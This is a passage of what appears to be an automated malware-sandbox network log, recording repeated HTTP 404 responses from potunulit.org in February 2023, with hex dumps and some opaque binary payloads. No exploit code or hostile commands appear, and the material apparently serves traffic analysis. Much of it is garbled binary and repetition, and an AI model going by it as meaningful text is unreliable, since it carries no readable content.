61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GbB0KSV9wS5oX3hByXp%2BXlDv54KVM8z3ecIfhU1SZ2ioZz90RifupIcYrso77dZcMJ918Io3UPKlCmn0jFnd9sK6J5clO2aCvztTtJVdTLGb3YbW%2FDRvcOvPz0gGDUhT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47745fe335fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KkiFYnKblfQoC%2B0iGgeBn5qKvhOh5uuuZUzvN%2FWITdd%2FUMiRFSnKB1G%2B959dBuZ%2FdCzVL%2FNzLRdCSfzHBtmDGrzDVJLBU3gHW2kr%2FSY94uxBRD4uTniY%2BdK3yeScsZXG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e4774e8cc35fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3javejhj1Wg33ArssltZOCA%2B0EzP3KzCIiiR3%2FPFKhBFxt3lkdRhSziou1Meo%2BdK1Cxfb4NXGJBVuhV2NLvsFj36OU%2F6ZNsjxFgMxTRwexHU6EsGKWijQKRRPfijuwr9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e477599cc35fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4a c2 5f 86 07 9c a7 53 f7 67 a3 7d 0a 55 3b e0 64 55 35 df 0b 67 0e 61 d4 0d 0a Data Ascii: 2cUys/~(`:J_Sg}U;dU5ga
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2ySOOfglmvxceTjMZBhxpmfe6ZoC1gLA6qqaJrdXfjNQvZjYy%2FF1wrGpGPvY3vfyIcYBZIDF%2BBH2bfYlzcSMF39Vwcrn7No2%2FC052zj89oy5zfhx8ArQ9YXEufLe4Txb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47baa92f90d6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PRFhKQXktepOXkOboyM7pomKXHvtbfN0ONIioaEGgYccDJ0B02EQBbZgaaLYg2XH99yXHF5LAnaj40lqDIH3XecNMupylSXxT6hXbhesaRVEcItaGiIk7Ny8Q%2FDC7M9S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47bbfa7190d6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 65 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 e2 82 1a fc 15 6f 36 53 f6 c7 35 f3 73 07 03 d2 ef f9 fb fa eb b1 87 6c cd fb 3d 33 d1 b0 77 45 7c 1f 57 44 94 68 84 3c 50 25 51 fe 08 22 b9 3f 19 66 3d 28 2a 97 6a dd d6 bc db 43 17 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed 05 12 b1 17 26 58 4a 33 4f 62 3e 17 21 2b da a3 06 83 3a 56 3f cb 00 23 ae 42 15 d7 07 53 53 fa cb 0f 9e 1d 09 52 2b e5 9d 83 7b 7e 45 f7 ff 78 8d 55 db d4 0d 13 13 bf 1e e1 92 24 08 4f c5 db b0 e6 a1 05 7e de f5 69 49 78 17 ab 5e af 9a 25 1a a8 a0 35 30 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 35 36 76 bf 76 34 fd f8 52 31 52 6c 11 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 00 db 1a c8 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 9c 01 6b 49 0d 92 90 f7 8f 3e e2 e7 72 3b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 f9 48 15 cc 81 99 bd 34 49 ce ba 68 f0 9c fc 9d 7f 9f 5b 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 b1 8a 64 f1 33 54 73 25 ed 70 17 4b 5d fc df 8e 82 81 fa e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 5e 54 ab de 08 0d 75 8f b7 af 57 a3 a0 98 85 1f d4 7c 7b 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca 92 b6 3b 35 2d 11 6d 43 38 b9 8b 8b e1 d2 69 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a6 b4 47 30 80 e3 1c e9 74 e3 52 48 04 29 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca e2 cf 25 4e b1 e0 a3 9c 04 98 c3 a7 79 60 fd d4 5f 09 69 43 9c 9f 34 62 18 3e 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 a3 e8 c8 47 e5 90 7a 9a e8 23 Data Ascii: 37ae`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*jo6S5sl=3wE|WDh<P%Q"?f=(*jC\SMUbT[U&XJ3Ob>!+:V?#BSSR+{~ExU$O~iIx^%50zN,%Qa
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZhVv9Hbs0Pu35ErVgIejY8akgvHGK9Z5epV68O699U83p3C0e0Gm4gWpMz0SQFKFYjU%2FsIo3X5T1eoHH5m15EYivk%2FCa8yLlMQlRlb27%2Fp6AHfv2Igzyua8nfqqXMQHi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47c938e690d6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XFK0QKkaa4pr36dTOcr1JvoLNkyph%2F8OC1pg6%2BqgaCfB%2B0jrtaV6xW2LoyPBDImuhA3oJ7pBjTCTWNJlQVpZx%2BjEc%2BSjaHtQviIUp7I6rxwKhVTncFPs0157is082Oyk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47c9b98590d6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OZ%2FjPrkqtcdSScC3gxiCqGcm2tLdo3QsuXe%2F339%2F2pwMU5tF1ETm1xJHfqtWOv%2FfOLpTc6pHJDADwehjyvj3ScvI4G58UhwwUhm8Gzeb6rFywVLsdIxilctHDBZYsvsJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47d54d30368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JxQQdeSH%2FRqLKZl0%2Famu5hbadwIAtq3ohh8zWVCHwWCrVav84QHXDxiKQu3lGP5gTm3TuQQikvq%2FJDOoozcHsk9Fm9MgDlTINQFMr%2B4bpneX9XsfV0Bxas5kX%2FhLXVsC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47d65eed368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 60 55 61 3a 79 ca 77 53 d5 9a 8c 9f 09 09 50 5c 31 86 f0 7d e1 37 bd 55 01 2f 79 de 2e f9 56 9c 30 f4 95 ea fe d1 32 eb 55 e0 a0 93 a8 fb 34 51 f7 ec dd d0 60 a8 58 87 cb 1b 8b 72 05 70 be ec f0 c0 a2 09 33 38 28 fa 85 0d a0 f4 03 9b 7c 7f bf 6c 13 d9 e8 ec 3d e5 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 7c 9a fd 19 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f e8 92 24 82 4e c5 03 9f df a1 61 7e de f5 96 ce 19 17 7e 4f af 9a a5 e4 c8 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f5 96 be 25 51 61 9f d4 3e 7c 88 28 c8 48 6b 51 d5 4a 9a 07 fd ec f1 27 78 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 e5 22 cd 4f 6b 79 82 ae 9c 37 17 4c 9d 48 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df 35 f9 e7 32 24 4c 80 90 00 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 52 30 ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 9b 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 db 06 b6 1b 6f d3 cb 29 32 a2 e6 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 4b 11 0c e4 a6 dd 11 9f 10 81 d8 b0 99 89 98 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb e9 64 17 28 d2 0e 53 1f d0 81 aa 7a 8f 30 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e d9 81 70 d4 03 2b b9 98 76 46 0f ca 82 29 27 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*`Ua:ywSP\1}7U/y.V02U4Q`Xrp38(|l=3Ob>!Z:V?#BSSQV+|~ExU$$Na~~OzN.%Qa>|(HkQJ
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sPDhrOjLZofCj5OxhMz6NIXYXAfNgVprp0TU6xLbsmLe9TF0XcXJ7eUfRR4gSq%2FQnENu3rFAu6ALYnAyezy%2FPgdrPY%2FUIezKuwsrV5haZZCsH73rkE9cUnt5IQO%2Bires"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47d90b20368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 